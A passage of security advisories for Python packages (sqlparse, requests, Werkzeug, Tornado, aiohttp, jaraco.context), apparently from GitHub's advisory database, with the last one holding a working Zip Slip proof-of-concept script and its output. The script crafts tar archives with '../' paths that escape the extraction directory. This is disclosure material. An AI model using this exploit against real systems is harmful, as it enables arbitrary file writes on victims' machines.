"introduced": "0"
},
{
"fixed": "0.5.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-13T16:16:11Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nThe below gist hangs while attempting to format a long list of tuples.\n\nThis was found while [drafting a regression test for Dja\nngo 5.2\u0027s composite primary key feature](https://code.djangoproject.com/ticket/36416#comment:3), which allows querying composite fields with tuples.\n\n###",
"id": "GHSA-27jp-wm6q-gp25",
"modified": "2026-02-13T16:16:11Z",
"published": "2026-02-13T16:16:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-27jp-wm6q-gp25"
},
{
"type": "WEB",
"url": "https://github.com/andialbrecht/sqlparse/commit/40ed3aa958657fa4a82055927fa9de70ab903360"
},
{
"type": "PACKAGE",
"url": "https://github.com/andialbrecht/sqlparse"
},
{
"type": "WEB",
"url": "https://github.com/andialbrecht/sqlparse/releases/tag/0.5.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "sqlparse: formatting list of tuples leads to denial of service"
}
GHSA-9HJG-9R4M-MVJ7
Vulnerability from github – Published: 2025-06-09 19:06 – Updated: 2025-06-09 19:06Impact
Due to a URL parsing issue, Requests releases prior to 2.32.4 may leak .netrc credentials to third parties for specific maliciously-crafted URLs.
Workarounds
For older versions of Requests, use of the .netrc file can be disabled with trust_env=False on your Requests Session (docs).
References
https://github.com/psf/requests/pull/6965 https://seclists.org/fulldisclosure/2025/Jun/2
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "requests"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.32.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-47081"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-09T19:06:08Z",
"nvd_published_at": "2025-06-09T18:15:24Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nDue to a URL parsing issue, Requests releases prior to 2.32.4 may leak .netrc credentials to third parties for specific maliciously-crafted URLs.\n\n### Workarounds\nFor older versions of Requests, use of the .netrc file can be disabled with `trust_env=False` on your Requests Session ([docs](https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env)).\n\n### References\nhttps://github.com/psf/requests/pull/6965\nhttps://seclists.org/fulldisclosure/2025/Jun/2",
"id": "GHSA-9hjg-9r4m-mvj7",
"modified": "2025-06-09T19:06:08Z",
"published": "2025-06-09T19:06:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/psf/requests/security/advisories/GHSA-9hjg-9r4m-mvj7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47081"
},
{
"type": "WEB",
"url": "https://github.com/psf/requests/pull/6965"
},
{
"type": "WEB",
"url": "https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef"
},
{
"type": "PACKAGE",
"url": "https://github.com/psf/requests"
},
{
"type": "WEB",
"url": "https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env"
},
{
"type": "WEB",
"url": "https://seclists.org/fulldisclosure/2025/Jun/2"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2025/Jun/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/06/03/11"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/06/03/9"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/06/04/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/06/04/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Requests vulnerable to .netrc credentials leak via malicious URLs"
}
GHSA-HRFV-MQP8-Q5RW
Vulnerability from github – Published: 2023-10-25 14:22 – Updated: 2026-05-20 22:21Werkzeug multipart data parser needs to find a boundary that may be between consecutive chunks. That's why parsing is based on looking for newline characters. Unfortunately, code looking for partial boundary in the buffer is written inefficiently, so if we upload a file that starts with CR or LF and then is followed by megabytes of data without these characters: all of these bytes are appended chunk by chunk into internal bytearray and lookup for boundary is performed on growing buffer.
This allows an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests. The amount of RAM required can trigger an out of memory kill of the process. If many concurrent requests are sent continuously, this can exhaust or kill all available workers.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Werkzeug"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Werkzeug"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0rc1"
},
{
"fixed": "2.3.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46136"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-25T14:22:59Z",
"nvd_published_at": "2023-10-25T18:17:36Z",
"severity": "MODERATE"
},
"details": "Werkzeug multipart data parser needs to find a boundary that may be between consecutive chunks. That\u0027s why parsing is based on looking for newline characters. Unfortunately, code looking for partial boundary in the buffer is written inefficiently, so if we upload a file that starts with CR or LF and then is followed by megabytes of data without these characters: all of these bytes are appended chunk by chunk into internal bytearray and lookup for boundary is performed on growing buffer.\n\nThis allows an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests. The amount of RAM required can trigger an out of memory kill of the process. If many concurrent requests are sent continuously, this can exhaust or kill all available workers.",
"id": "GHSA-hrfv-mqp8-q5rw",
"modified": "2026-05-20T22:21:18Z",
"published": "2023-10-25T14:22:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-hrfv-mqp8-q5rw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46136"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/b1916c0c083e0be1c9d887ee2f3d696922bfc5c1"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/cbb446fdcada7685fce936ded01b76c08dbd6eb5"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/f2300208d5e2a5076cbbb4c2aad71096fd040ef9"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/f3c803b3ade485a45f12b6d6617595350c0f03e2"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/werkzeug"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/werkzeug/PYSEC-2023-221.yaml"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20231124-0008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Werkzeug DoS: High resource usage when parsing multipart/form-data containing a large part with CR/LF character at the beginning"
}
GHSA-7CX3-6M66-7C5M
Vulnerability from github – Published: 2025-05-16 14:12 – Updated: 2025-05-29 06:31Summary
When Tornado's multipart/form-data parser encounters certain errors, it logs a warning but continues trying to parse the remainder of the data. This allows remote attackers to generate an extremely high volume of logs, constituting a DoS attack. This DoS is compounded by the fact that the logging subsystem is synchronous.
Affected versions
All versions of Tornado prior to 6.5 are affected. The vulnerable parser is enabled by default.
Solution
Upgrade to Tornado version 6.5. In the meantime, risk can be mitigated by blocking Content-Type: multipart/form-data in a proxy.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tornado"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-47287"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-16T14:12:40Z",
"nvd_published_at": "2025-05-15T22:15:18Z",
"severity": "HIGH"
},
"details": "### Summary\n\nWhen Tornado\u0027s ``multipart/form-data`` parser encounters certain errors, it logs a warning but continues trying to parse the remainder of the data. This allows remote attackers to generate an extremely high volume of logs, constituting a DoS attack. This DoS is compounded by the fact that the logging subsystem is synchronous.\n\n### Affected versions\n\nAll versions of Tornado prior to 6.5 are affected. The vulnerable parser is enabled by default.\n\n### Solution\n\nUpgrade to Tornado version 6.5. In the meantime, risk can be mitigated by blocking `Content-Type: multipart/form-data` in a proxy.",
"id": "GHSA-7cx3-6m66-7c5m",
"modified": "2025-05-29T06:31:17Z",
"published": "2025-05-16T14:12:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-7cx3-6m66-7c5m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47287"
},
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/commit/b39b892bf78fe8fea01dd45199aa88307e7162f3"
},
{
"type": "PACKAGE",
"url": "https://github.com/tornadoweb/tornado"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00038.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Tornado vulnerable to excessive logging caused by malformed multipart form data"
}
GHSA-63HF-3VF5-4WQF
Vulnerability from github – Published: 2026-04-01 21:49 – Updated: 2026-04-06 23:12Summary
The C parser (the default for most installs) accepted null bytes and control characters is response headers.
Impact
An attacker could send header values that are interpreted differently than expected due to the presence of control characters. For example, request.url.origin() may return a different value than the raw Host header, or what a reverse proxy interpreted it as., potentially resulting in some kind of security bypass.
Patch: https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34520"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:49:06Z",
"nvd_published_at": "2026-04-01T21:17:00Z",
"severity": "LOW"
},
"details": "### Summary\n\nThe C parser (the default for most installs) accepted null bytes and control characters is response headers.\n\n### Impact\n\nAn attacker could send header values that are interpreted differently than expected due to the presence of control characters. For example, `request.url.origin()` may return a different value than the raw Host header, or what a reverse proxy interpreted it as., potentially resulting in some kind of security bypass.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4",
"id": "GHSA-63hf-3vf5-4wqf",
"modified": "2026-04-06T23:12:09Z",
"published": "2026-04-01T21:49:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hf-3vf5-4wqf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34520"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP\u0027s C parser (llhttp) accepts null bytes and control characters in response header values - header injection/security bypass"
}
GHSA-58PV-8J8X-9VJ2
Vulnerability from github – Published: 2026-01-13 21:48 – Updated: 2026-01-22 22:25Summary
There is a Zip Slip path traversal vulnerability in the jaraco.context package affecting setuptools as well, in jaraco.context.tarball() function. The vulnerability may allow attackers to extract files outside the intended extraction directory when malicious tar archives are processed.
The strip_first_component filter splits the path on the first / and extracts the second component, while allowing ../ sequences. Paths like dummy_dir/../../etc/passwd become ../../etc/passwd.
Note that this suffers from a nested tarball attack as well with multi-level tar files such as dummy_dir/inner.tar.gz, where the inner.tar.gz includes a traversal dummy_dir/../../config/.env that also gets translated to ../../config/.env.
The code can be found: - https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/init.py#L74-L91 - https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76 (inherited)
This report was also sent to setuptools maintainers and they asked some questions regarding this.
The lengthy answer is:
The vulnerability seems to be the strip_first_component filter function, not the tarball function itself and has the same behavior on any tested Python version locally (from 11 to 14, as I noticed that there is a backports conditional for the tarball).
The stock tarball for Python 3.12+ is considered not vulnerable (until proven otherwise 😄) but here the custom filter seems to overwrite the native filtering and introduces the issue - while overwriting the updated secure Python 3.12+ behavior and giving a false sense of sanitization.
The short answer is:
If we are talking about Python < 3.12 the tarball and jaraco implementations / behaviors are relatively the same but for Python 3.12+ the jaraco implementation overwrites the native tarball protection.
Sampled tests:
Details
The flow with setuptools in the mix:
setuptools._vendor.jaraco.context.tarball() > req = urlopen(url) > with tarfile.open(fileobj=req, mode='r|*') as tf: > tf.extractall(path=target_dir, filter=strip_first_component) > strip_first_component (Vulnerable)
PoC
This was tested on multiple Python versions > 11 on a Debian GNU 12 (bookworm). You can run this directly after having all the dependencies:
#!/usr/bin/env python3
import tarfile
import io
import os
import sys
import shutil
import tempfile
from setuptools._vendor.jaraco.context import strip_first_component
def create_malicious_tarball(traversal_to_root: str):
tar_data = io.BytesIO()
with tarfile.open(fileobj=tar_data, mode='w') as tar:
# Create a malicious file path with traversal sequences
malicious_files = [
# Attempt 1: Simple traversal to /tmp
{
'path': f'dummy_dir/{traversal_to_root}tmp/pwned_by_zipslip.txt',
'content': b'[ZIPSLIP] File written to /tmp via path traversal!',
'name': 'pwned_via_tmp'
},
# Attempt 2: Try to write to home directory
{
'path': f'dummy_dir/{traversal_to_root}home/pwned_home.txt',
'content': b'[ZIPSLIP] Attempted write to home directory',
'name': 'pwned_via_home'
},
# Attempt 3: Try to write to current directory parent
{
'path': 'dummy_dir/../escaped.txt',
'content': b'[ZIPSLIP] File in parent directory!',
'name': 'pwned_escaped'
},
# Attempt 4: Legitimate file for comparison
{
'path': 'dummy_dir/legitimate_file.txt',
'content': b'This file stays in target directory',
'name': 'legitimate'
}
]
for file_info in malicious_files:
content = file_info['content']
tarinfo = tarfile.TarInfo(name=file_info['path'])
tarinfo.size = len(content)
tar.addfile(tarinfo, io.BytesIO(content))
tar_data.seek(0)
return tar_data
def exploit_zipslip():
print(\"[*] Target: setuptools._vendor.jaraco.context.tarball()\")
# Create temporary directory for extraction
temp_base = tempfile.mkdtemp(prefix=\"zipslip_test_\")
target_dir = os.path.join(temp_base, \"extraction_target\")
try:
os.mkdir(target_dir)
print(f\"[+] Created target extraction directory: {target_dir}\")
target_dir_abs = os.path.abspath(target_dir)
print(target_dir_abs)
depth_to_root = len([p for p in target_dir_abs.split(os.sep) if p])
traversal_to_root = \"../\" * depth_to_root
print(f\"[+] Using traversal_to_root prefix: {traversal_to_root!r}\")
# Create malicious tarball
print(\"[*] Creating malicious tar archive...\")
tar_data = create_malicious_tarball(traversal_to_root)
try:
with tarfile.open(fileobj=tar_data, mode='r') as tf:
for member in tf:
# Apply the ACTUAL vulnerable function from setuptools
processed_member = strip_first_component(member, target_dir)
print(f\"[*] Extracting: {member.name:40} -> {processed_member.name}\")
# Extract to target directory
try:
tf.extract(processed_member, path=target_dir)
print(f\" ✓ Extracted successfully\")
except (PermissionError, FileNotFoundError, OSError) as e:
print(f\" ! {type(e).__name__}: Path traversal ATTEMPTED\")
except Exception as e:
print(f\"[!] Extraction raised exception: {type(e).__name__}: {e}\")
# Check results
print(\"[*] Checking for extracted files...\")
# Check target directory
print(f\"[*] Files in target directory ({target_dir}):\")
if os.path.exists(target_dir):
for root, _, files in os.walk(target_dir):
level = root.replace(target_dir, '').count(os.sep)
indent = ' ' * 2 * level
print(f\"{indent}{os.path.basename(root)}/\")
subindent = ' ' * 2 * (level + 1)
for file in files:
filepath = os.path.join(root, file)
try:
with open(filepath, 'r') as f:
content = f.read()[:50]
print(f\"{subindent}{file}\")
print(f\"{subindent} └─ {content}...\")
except:
print(f\"{subindent}{file} (binary)\")
else:
print(f\"[!] Target directory not found!\")
print()
print(\"[*] Checking for traversal attempts...\")
print()
# Check if files escaped
traversal_attempts = [
(\"/tmp/pwned_by_zipslip.txt\", \"Escape to /tmp\"),
(os.path.expanduser(\"~/pwned_home.txt\"), \"Escape to home\"),
(os.path.join(temp_base, \"escaped.txt\"), \"Escape to parent\"),
]
escaped = False
for check_path, description in traversal_attempts:
if os.path.exists(check_path):
print(f\"[+] Path Traversal Confirmed: {description}\")
print(f\" File created at: {check_path}\")
try:
with open(check_path, 'r') as f:
content = f.read()
print(f\" Content: {content}\")
print(f\" Removing: {check_path}\")
os.remove(check_path)
except Exception as e:
print(f\" Error reading: {e}\")
escaped = True
else:
print(f\"[-] OK: {description} - No escape detected\")
if escaped:
print(\"[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed!\")
else:
print(\"[-] No path traversal detected (mitigation in place)\")
finally:
# Cleanup
print()
print(f\"[*] Cleaning up: {temp_base}\")
try:
shutil.rmtree(temp_base)
except Exception as e:
print(f\"[!] Cleanup error: {e}\")
def check_python_version():
print(f\"[+] Python version: {sys.version}\")
# Python 3.11.4+ added DEFAULT_FILTER
if hasattr(tarfile, 'DEFAULT_FILTER'):
print(\"[+] Python has DEFAULT_FILTER (tarfile security hardening)\")
else:
print(\"[!] Python does not have DEFAULT_FILTER (older version)\")
print()
if __name__ == \"__main__\":
check_python_version()
exploit_zipslip()
Output:
[+] Python version: 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0]
[!] Python does not have DEFAULT_FILTER (older version)
[*] Target: setuptools._vendor.jaraco.context.tarball()
[+] Created target extraction directory: /tmp/zipslip_test_tnu3qpd5/extraction_target
[*] Creating malicious tar archive...
[*] Extracting: ../../tmp/pwned_by_zipslip.txt -> ../../tmp/pwned_by_zipslip.txt
✓ Extracted successfully
[*] Extracting: ../../../../home/pwned_home.txt -> ../../../../home/pwned_home.txt
! PermissionError: Path traversal ATTEMPTED
[*] Extracting: ../escaped.txt -> ../escaped.txt
✓ Extracted successfully
[*] Extracting: legitimate_file.txt -> legitimate_file.txt
✓ Extracted successfully
[*] Checking for extracted files...
[*] Files in target directory (/tmp/zipslip_test_tnu3qpd5/extraction_target):
extraction_target/
legitimate_file.txt
└─ This file stays in target directory...
[*] Checking for traversal attempts...
[-] OK: Escape to /tmp - No escape detected
[-] OK: Escape to home - No escape detected
[+] Path Traversal Confirmed: Escape to parent
File created at: /tmp/zipslip_test_tnu3qpd5/escaped.txt
Content: [ZIPSLIP] File in parent directory!
Removing: /tmp/zipslip_test_tnu3qpd5/escaped.txt
[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed!
[*] Cleaning up: /tmp/zipslip_test_tnu3qpd5
Impact
- Arbitrary file creation in filesystem (HIGH exploitability) - especially if popular packages download tar files remotely and use this package to extract files.
- Privesc (LOW exploitability)
- Supply-Chain attack (VARIABLE exploitability) - relevant to the first point.
Remediation
I guess removing the custom filter is not feasible given the backward compatibility issues that might come up you can use a safer filter strip_first_component that skips or sanitizes ../ character sequences since it is already there eg.
if member.name.startswith('/') or '..' in member.name:
raise ValueError(f\"Attempted path traversal detected: {member.name}\")
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "jaraco.context"
},
"ranges": [
{
"events": [
{
"introduced": "5.2.0"
},
{
"fixed": "6.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23949"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-13T21:48:17Z",
"nvd_published_at": "2026-01-20T01:15:57Z",
"severity": "HIGH"
},
"details": "### Summary\nThere is a Zip Slip path traversal vulnerability in the jaraco.context package affecting setuptools as well, in `jaraco.context.tarball()` function. The vulnerability may allow attackers to extract files outside the intended extraction directory when malicious tar archives are processed.\nThe strip_first_component filter splits the path on the first `/` and extracts the second component, while allowing `../` sequences. Paths like `dummy_dir/../../etc/passwd` become `../../etc/passwd`.\nNote that this suffers from a nested tarball attack as well with multi-level tar files such as `dummy_dir/inner.tar.gz`, where the inner.tar.gz includes a traversal `dummy_dir/../../config/.env` that also gets translated to `../../config/.env`.\n\nThe code can be found:\n- https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91\n- https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76 (inherited)\n\nThis report was also sent to setuptools maintainers and they asked some questions regarding this.\n\nThe lengthy answer is:\n\nThe vulnerability seems to be the `strip_first_component` filter function, not the tarball function itself and has the same behavior on any tested Python version locally (from 11 to 14, as I noticed that there is a backports conditional for the tarball).\nThe stock tarball for Python 3.12+ is considered not vulnerable (until proven otherwise \ud83d\ude04) but here the custom filter seems to overwrite the native filtering and introduces the issue - while overwriting the updated secure Python 3.12+ behavior and giving a false sense of sanitization.\n\nThe short answer is:\n\nIf we are talking about Python \u003c 3.12 the tarball and jaraco implementations / behaviors are relatively the same but for Python 3.12+ the jaraco implementation overwrites the native tarball protection.\n\nSampled tests:\n\u003cimg width=\"1634\" height=\"245\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ce6c0de6-bb53-4c2b-818a-d77e28d2fbeb\" /\u003e\n\n### Details\n\nThe flow with setuptools in the mix:\n```\nsetuptools._vendor.jaraco.context.tarball() \u003e req = urlopen(url) \u003e with tarfile.open(fileobj=req, mode=\u0027r|*\u0027) as tf: \u003e tf.extractall(path=target_dir, filter=strip_first_component) \u003e strip_first_component (Vulnerable)\n```\n\n### PoC\n\nThis was tested on multiple Python versions \u003e 11 on a Debian GNU 12 (bookworm).\nYou can run this directly after having all the dependencies:\n```py\n#!/usr/bin/env python3\nimport tarfile\nimport io\nimport os\nimport sys\nimport shutil\nimport tempfile\nfrom setuptools._vendor.jaraco.context import strip_first_component\n\n\ndef create_malicious_tarball(traversal_to_root: str):\n tar_data = io.BytesIO()\n with tarfile.open(fileobj=tar_data, mode=\u0027w\u0027) as tar:\n # Create a malicious file path with traversal sequences\n malicious_files = [\n # Attempt 1: Simple traversal to /tmp\n {\n \u0027path\u0027: f\u0027dummy_dir/{traversal_to_root}tmp/pwned_by_zipslip.txt\u0027,\n \u0027content\u0027: b\u0027[ZIPSLIP] File written to /tmp via path traversal!\u0027,\n \u0027name\u0027: \u0027pwned_via_tmp\u0027\n },\n # Attempt 2: Try to write to home directory\n {\n \u0027path\u0027: f\u0027dummy_dir/{traversal_to_root}home/pwned_home.txt\u0027,\n \u0027content\u0027: b\u0027[ZIPSLIP] Attempted write to home directory\u0027,\n \u0027name\u0027: \u0027pwned_via_home\u0027\n },\n # Attempt 3: Try to write to current directory parent\n {\n \u0027path\u0027: \u0027dummy_dir/../escaped.txt\u0027,\n \u0027content\u0027: b\u0027[ZIPSLIP] File in parent directory!\u0027,\n \u0027name\u0027: \u0027pwned_escaped\u0027\n },\n # Attempt 4: Legitimate file for comparison\n {\n \u0027path\u0027: \u0027dummy_dir/legitimate_file.txt\u0027,\n \u0027content\u0027: b\u0027This file stays in target directory\u0027,\n \u0027name\u0027: \u0027legitimate\u0027\n }\n ]\n for file_info in malicious_files:\n content = file_info[\u0027content\u0027]\n tarinfo = tarfile.TarInfo(name=file_info[\u0027path\u0027])\n tarinfo.size = len(content)\n tar.addfile(tarinfo, io.BytesIO(content))\n\n tar_data.seek(0)\n return tar_data\n\n\ndef exploit_zipslip():\n print(\\\"[*] Target: setuptools._vendor.jaraco.context.tarball()\\\")\n\n # Create temporary directory for extraction\n temp_base = tempfile.mkdtemp(prefix=\\\"zipslip_test_\\\")\n target_dir = os.path.join(temp_base, \\\"extraction_target\\\")\n\n try:\n os.mkdir(target_dir)\n print(f\\\"[+] Created target extraction directory: {target_dir}\\\")\n\n target_dir_abs = os.path.abspath(target_dir)\n print(target_dir_abs)\n depth_to_root = len([p for p in target_dir_abs.split(os.sep) if p])\n traversal_to_root = \\\"../\\\" * depth_to_root\n print(f\\\"[+] Using traversal_to_root prefix: {traversal_to_root!r}\\\")\n\n # Create malicious tarball\n print(\\\"[*] Creating malicious tar archive...\\\")\n tar_data = create_malicious_tarball(traversal_to_root)\n\n try:\n with tarfile.open(fileobj=tar_data, mode=\u0027r\u0027) as tf:\n for member in tf:\n # Apply the ACTUAL vulnerable function from setuptools\n processed_member = strip_first_component(member, target_dir)\n print(f\\\"[*] Extracting: {member.name:40} -\u003e {processed_member.name}\\\")\n\n # Extract to target directory\n try:\n tf.extract(processed_member, path=target_dir)\n print(f\\\" \u2713 Extracted successfully\\\")\n except (PermissionError, FileNotFoundError, OSError) as e:\n print(f\\\" ! {type(e).__name__}: Path traversal ATTEMPTED\\\")\n except Exception as e:\n print(f\\\"[!] Extraction raised exception: {type(e).__name__}: {e}\\\")\n\n # Check results\n print(\\\"[*] Checking for extracted files...\\\")\n\n # Check target directory\n print(f\\\"[*] Files in target directory ({target_dir}):\\\")\n if os.path.exists(target_dir):\n for root, _, files in os.walk(target_dir):\n level = root.replace(target_dir, \u0027\u0027).count(os.sep)\n indent = \u0027 \u0027 * 2 * level\n print(f\\\"{indent}{os.path.basename(root)}/\\\")\n subindent = \u0027 \u0027 * 2 * (level + 1)\n for file in files:\n filepath = os.path.join(root, file)\n try:\n with open(filepath, \u0027r\u0027) as f:\n content = f.read()[:50]\n print(f\\\"{subindent}{file}\\\")\n print(f\\\"{subindent} \u2514\u2500 {content}...\\\")\n except:\n print(f\\\"{subindent}{file} (binary)\\\")\n else:\n print(f\\\"[!] Target directory not found!\\\")\n\n print()\n print(\\\"[*] Checking for traversal attempts...\\\")\n print()\n\n # Check if files escaped\n traversal_attempts = [\n (\\\"/tmp/pwned_by_zipslip.txt\\\", \\\"Escape to /tmp\\\"),\n (os.path.expanduser(\\\"~/pwned_home.txt\\\"), \\\"Escape to home\\\"),\n (os.path.join(temp_base, \\\"escaped.txt\\\"), \\\"Escape to parent\\\"),\n ]\n\n escaped = False\n for check_path, description in traversal_attempts:\n if os.path.exists(check_path):\n print(f\\\"[+] Path Traversal Confirmed: {description}\\\")\n print(f\\\" File created at: {check_path}\\\")\n try:\n with open(check_path, \u0027r\u0027) as f:\n content = f.read()\n print(f\\\" Content: {content}\\\")\n print(f\\\" Removing: {check_path}\\\")\n os.remove(check_path)\n except Exception as e:\n print(f\\\" Error reading: {e}\\\")\n escaped = True\n else:\n print(f\\\"[-] OK: {description} - No escape detected\\\")\n\n if escaped:\n print(\\\"[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed!\\\")\n else:\n print(\\\"[-] No path traversal detected (mitigation in place)\\\")\n\n finally:\n # Cleanup\n print()\n print(f\\\"[*] Cleaning up: {temp_base}\\\")\n try:\n shutil.rmtree(temp_base)\n except Exception as e:\n print(f\\\"[!] Cleanup error: {e}\\\")\n\n\ndef check_python_version():\n print(f\\\"[+] Python version: {sys.version}\\\")\n # Python 3.11.4+ added DEFAULT_FILTER\n if hasattr(tarfile, \u0027DEFAULT_FILTER\u0027):\n print(\\\"[+] Python has DEFAULT_FILTER (tarfile security hardening)\\\")\n else:\n print(\\\"[!] Python does not have DEFAULT_FILTER (older version)\\\")\n print()\n\n\nif __name__ == \\\"__main__\\\":\n check_python_version()\n exploit_zipslip()\n```\n\nOutput:\n```\n[+] Python version: 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] \n[!] Python does not have DEFAULT_FILTER (older version) \n\n[*] Target: setuptools._vendor.jaraco.context.tarball() \n[+] Created target extraction directory: /tmp/zipslip_test_tnu3qpd5/extraction_target \n[*] Creating malicious tar archive... \n[*] Extracting: ../../tmp/pwned_by_zipslip.txt -\u003e ../../tmp/pwned_by_zipslip.txt \n \u2713 Extracted successfully \n[*] Extracting: ../../../../home/pwned_home.txt -\u003e ../../../../home/pwned_home.txt \n ! PermissionError: Path traversal ATTEMPTED \n[*] Extracting: ../escaped.txt -\u003e ../escaped.txt \n \u2713 Extracted successfully \n[*] Extracting: legitimate_file.txt -\u003e legitimate_file.txt \n \u2713 Extracted successfully \n[*] Checking for extracted files... \n[*] Files in target directory (/tmp/zipslip_test_tnu3qpd5/extraction_target): \nextraction_target/ \n legitimate_file.txt \n \u2514\u2500 This file stays in target directory... \n\n[*] Checking for traversal attempts... \n\n[-] OK: Escape to /tmp - No escape detected \n[-] OK: Escape to home - No escape detected \n[+] Path Traversal Confirmed: Escape to parent \n File created at: /tmp/zipslip_test_tnu3qpd5/escaped.txt \n Content: [ZIPSLIP] File in parent directory! \n Removing: /tmp/zipslip_test_tnu3qpd5/escaped.txt \n[+] EXPLOIT 